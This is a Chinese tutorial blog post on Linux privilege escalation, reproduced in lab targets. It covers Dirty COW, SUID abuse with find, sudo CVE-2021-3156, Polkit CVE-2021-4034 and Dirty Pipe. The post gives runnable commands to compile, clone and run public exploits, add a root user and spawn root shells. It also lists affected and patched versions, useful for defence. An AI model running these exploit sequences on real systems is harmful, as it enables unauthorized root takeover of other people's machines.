首页 > 系统相关 >Linux提权

Linux提权

时间:2024-03-04 16:13:09浏览次数:35  
标签:SUID 提权 Linux CVE root 漏洞

概述

Linux安装好系统后里面自带的软件或内核存在的漏洞,比较流行的有“脏牛提权” Linux内核提权跟Windows一样,都要下载对应漏洞的脚本进行提权

Linux内核提权

linux提权步骤

1.进行基础信息收集

uname -a #打印所有可用的系统信息
uname -r #内核版本
uname -n #系统主机名。
uname -m #查看系统内核架构(64位/32位)
hostname #系统主机名
cat/proc/version #内核信息
cat/etc/*-release #分发信息
cat/etc/issue #分发信息
cat /proc/cpuinfo #CPU信息
cat /etc/1sb-release  # Debian I
cat /etc/redhat-release # Redhat
ls /boot | grep vmlinuz-

2.查找相关版本的内核漏洞

exp搜索链接:https://www.exploit-db.com/ (kali自带命令:searchsploit)
image

exp下载链接:https://github.com/SecWiki/linux-kernel-exploits(该链接中收集了大部分Linux系统cve漏洞的exp,在readme中有受影响的内核版本和使用方法)

3.使用exp,利用漏洞进行提权

ubuntu14脏牛提权

要注意的是执行完脚本后服务器可能会挂

系统信息
image

蚁剑连接靶机,将dirty.c要编译的文件放在/var/tmp目录下

image
查看一下dirty.c文件中的说明,执行以下命令
image

gcc -pthread dirty.c -o dirty -lcrypt

image

运行脚本,并设置新增管理账号密码为Admin@22,查看/etc/passwd,发现有新增的firefart管理用户,使用该账户直接ssh登录即可

./dirty Admin@22

image

centos6脏牛提权

蚁剑连接,上传脏牛提权文件dirty.c
image
image
msf反弹shell
image
python获得一个交互式shell(防止ssh不能连接,交互式shell可以通过su命令拿到管理员的shell)

python -c "import pty;pty.spawn('/bin/bash')"

image
编译dirty.c文件,然后执行编译后的dirty脚本,并设置管理密码为Admin@22。接着利用交互式shell的su命令登录firefart用户
image

SUID 提权

SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义。

通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls设置了SUID权限,我们可在非root用户下运行该二进制可执行文件,在执行文件时,该进程的权限将为root权限.

利用此特性,我们可通过SUID进行提权

设置SUID

chmod u+s filename   #设置SUID位
chmod u-s filename   #去掉SUID设置

常见的可用来提权的Linux 可执行文件有:

nmap、vim、find、bash、more、less、nano、cp、awk

查看可以suid 提权的可执行文件

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null

image

  • find
# ls -la /usr/bin/find
-rwsr-sr-x. 1 root root 199304 Oct 31  2018 /usr/bin/find

实用程序find用来在系统中查找文件。同时,它也有执行命令的能力。 因此,如果配置为使用SUID权限运行,则可以通过find执行的命令都将以root身份去运行。

bash-4.2$ touch 456
bash-4.2$ find / -type f -name 456 -exec "whoami" \;
root

image

bash-4.2$ find . -exec /bin/sh -p \; -quit
sh-4.2# whoami
root

image

辅助网站:https://gtfobins.github.io/ (可提权的二进制文件 各种命令的各种用法)

Sudo 提权(CVE-2021-3156)

概述

当sudo通过 -s 或 -i 命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用 -s 或 -i 标志运行 sudoedit 时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。(存在十年之久)

影响版本

sudo 1.8.2 - 1.8.31p2
sudo 1.9.0 - 1.9.5p1

查看sudo版本

命令:sudo --version

image

以非 root 用户登录系统,并使用命令 sudoedit -s /

  • 如果响应一个以 sudoedit: 开头的报错,那么表明存在漏洞。
  • 如果响应一个以 usage:开头的报错,那么表明补丁已经生效。
    image
    exp地址:https://github.com/blasty/CVE-2021-3156

exp可用与18.04 20.04.1 debian10

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich

image
根据操作系统发行版本选择不同的id即可提权

Polkit提权(CVE-2021-4034)

漏洞描述:该漏洞是由于pkexec无法正确处理调用参数,从而将环境变量作为命令执行,具有任意用户权限的攻击者都可以在默认配置下通过修改环境变量来利用此漏洞,从而获得受影响主机的root权限。

受影响linux

2009年5月至 2022 年1月26日发布的所有Polkit 版本 Polkit预装在CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等多个Linux发行版上,所有存在该版本范围Polkit的Linux系统均受影响。

版本检测:

Linux系统用户可以通过查看Polkit版本来判断当前系统是否在受影响范围内,主流Linux发行版命令如下:

CentOS、RedHat 系列:

rpm -qa polkit

Debian、Ubuntu 系列:

dpkg -l policykit-1

不受影响版本

CentOS:

CentOS 6:polkit-0.96-11.el6_10.2
CentOS 7:polkit-0.112-26.el7_9.1
CentOS 8.0:polkit-0.115-13.el8_5.1
CentOS 8.2:polkit-0.115-11.el8_2.2
CentOS 8.4:polkit-0.115-11.el8_4.2

Ubuntu:

Ubuntu 14.04 ESM:policykit-1-0.105-4ubuntu3.14.04.6+esm1
Ubuntu 16.04 ESM:policykit-1-0.105-14.1ubuntu0.5+esm1
Ubuntu 18.04 LTS:policykit-1-0.105-20ubuntu0.18.04.6
Ubuntu 20.04 LTS:policykit-1-0.105-26ubuntu1.2
Ubuntu 21.10:policykit-1-0.105-31ubuntu0.1

Debain:

Debain stretch:policykit-1 0.105-18+deb9u2
Debain buster:policykit-1 0.105-25+deb10u1
Debain bullseye:policykit-1 0.105-31+deb11u1
Debain bookworm,bullseye:policykit-1 0.105-31.1

漏洞复现:

Ubuntu复现

exp:https://github.com/berdav/CVE-2021-4034

1.复现环境:

操作系统:Linux VM-0-5-ubuntu 5.4.0-88-generic x86_64 x86_64 x86_64 GNU/Linux

image

ubuntu 20.04.4/pkexec版本:0.105
image

2.漏洞提权触发:

(1)本地普通用户权限:ubuntu权限

id

image

(2)执行exp提权root

make
./exploit
id

image

CentOS7 复现

exp:https://github.com/arthepsy/CVE-2021-4034.git
image

Dirty Pipe 提权 (CVE-2022-0847)

漏洞描述 CVE-2022-0847-DirtyPipe-Exploit 存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件(甚至是只读文件)中的数据,从而可将普通权限的用户提升到root权限

CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用,漏洞作者将此漏洞命名为Dirty Pipe

影响版本 影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102

复现环境:Linux kali 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12) x86_64 GNU/Linux

exp:https://github.com/imfiver/CVE-2022-0847.git

git clone https://github.com/imfiver/CVE-2022-0847.git
cd CVE-2022-0847
chmod +x Dirty-Pipe.sh
bash Dirty-Pipe.sh

image

标签:SUID,提权,Linux,CVE,root,漏洞
From: https://www.cnblogs.com/DumpInfou/p/18052010

相关文章

  • linux 常用命令
    //通过killall命令killallnginx//通过pkill命令,类似于pgrep+killpkillnginx//通过先查找再kill的方式ps-ef|grepnginx|grep-vgrep|awk'{print$2}'|xargskill-9//用cut-c来截取指定位置的字符串ps-ef|grepnginx|grep-vgrep|cut......
  • linux 中正则表达式中?号的作用
     linux中正则表达式中?号的作用是匹配前面的字母0次或者1次;001、测试如下:[root@pc1test1]#lsa.txt[root@pc1test1]#cata.txt##测试样本abcdxyz133kkkkabdejjjddduabbcdejjjaaaeabbbcdejjj[root@pc1test1]#grep"abcd"a.txt......
  • linux安装南大通用数据库 GBase 8s V8
    @目录1、操作系统、数据库2、下载链接3、安装文档4、安装前准备4.1、以root用户创建gbasedbt组和用户4.2、创建GBase8s数据库安装目录4.3、上传并解压安装包5、安装5.1、执行安装程序5.2、回车继续直到接受许可条款5.3、输入安装目录绝对路径5.4、选择安装类型5.5、选择安装......
  • linux 安装神州通用数据库 V7
    @目录操作系统、数据库1、官方下载链接2、windows客户端下载链接3、官方安装手册4、安装前准备3.1、创建安装用户3.2、以root用户修改神通数据库安装包的所有者为shentong用户3.3、以root用户创建神通数据库主目录并修改所有者为shentong用户3.4、以root用户临时修改init.d......
  • shell工具连接linux时的报错问题
    问题描述在使用shell工具连接linux时报以下错误SSH!Agentauthselected,butnorunningagentisdetectedSSH!Agentauthselected,butnorunningagentisdetected解决方法方法1#首先使用ping方法查看是否在同一网段pingxxx.xxx.xx.x方法2#安装[openss......
  • linux安全加固(几项)
    Linux安全加固运维网工 2024-02-2910:32 重庆账号和权限系统用户超级管理员:UID=0系统默认用户:系统程序使用,从不登录新增普通用户:UID大于500用户管理添加用户:useradd<用户名>删除用户:userdel[-r][-f] <用户名> 锁定/解锁用户:passwd......
  • 如何使用/proc文件系统监控Linux系统?
    如何使用/proc文件系统监控Linux系统?原创 漫谈君 运维漫谈 2024-02-2909:58 江苏/proc是Linux系统中的一个虚拟文件系统,提供了对运行中内核和进程的实时访问。这个目录下包含了很多以数字命名的目录,每个目录代表一个运行中的进程或者系统信息。每个进程目录下有许多......
  • Linux 监控工具htop
    htopyum安装[root@localhost~]#yum-yinstallepel-release[root@localhost~]#yuminstallhtop[root@localhost~]#yum-yinstallepel-release[root@localhost~]#yuminstallhtop[root@localhost~]#htop......
  • linux指令:dpkg和apt
    dpkg是debian包管理器,一般来说用于管理已下载好的deb包1.安装指令dpkg-i<路径下的包名> 2.列出路径下的包及其状态dpkg-l其中前面两个代表状态的字母分别是包的期望状态和当前状态 也可以在-l之后加上关键词筛选 3.删除指定的包dpkg-r<路径下的包名>......
  • linux指令:chmod
    全名changemode改变文件的权限语法:chmod<object+mod><file> 其中mod可以是读(r)写(w)执行(x)等权限,object表示对什么对象(所有,a;同一组成员,g;所有者,u;其他,o)进行权限改变例子:chmodg+w,g-r1.txt表示对1.txt修改操作:在同一用户组下赋予(+)写(w)的权限,但去除(-)读......